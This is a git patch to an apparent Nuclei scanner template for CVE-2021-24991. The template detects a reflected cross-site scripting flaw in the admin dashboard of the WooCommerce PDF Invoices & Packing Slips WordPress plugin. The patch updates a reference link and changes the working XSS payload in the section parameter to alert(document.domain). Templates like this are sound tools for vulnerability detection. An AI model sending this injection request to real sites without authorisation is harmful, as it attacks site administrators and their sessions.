From 4fea6b14f49ff7067cede5ed8c9a369c8823f8e1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 9 Feb 2022 00:42:32 +0530 Subject: [PATCH] Update CVE-2021-24991.yaml --- cves/2021/CVE-2021-24991.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-24991.yaml b/cves/2021/CVE-2021-24991.yaml index e4634309d9..8be68cf940 100644 --- a/cves/2021/CVE-2021-24991.yaml +++ b/cves/2021/CVE-2021-24991.yaml @@ -6,7 +6,7 @@ info: severity: medium description: The WooCommerce PDF Invoices & Packing Slips WordPress plugin before 2.10.5 does not escape the tab and section parameters before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting in the admin dashboard. reference: - - https://wpscan.com/vulnerability/cb232354-f74d-48bb-b437-7bdddd1df42a + - https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9 - https://nvd.nist.gov/vuln/detail/CVE-2021-24991 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N @@ -27,7 +27,7 @@ requests: log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | - GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28/XSS/%29+x%3D HTTP/1.1 + GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1 Host: {{Hostname}} cookie-reuse: true @@ -36,10 +36,10 @@ requests: - type: word part: body words: - - "\" style=animation-name:rotation onanimationstart=alert(/XSS/) x" + - "\" style=animation-name:rotation onanimationstart=alert(document.domain) x" - "WooCommerce PDF Invoices" condition: and - type: status status: - - 200 \ No newline at end of file + - 200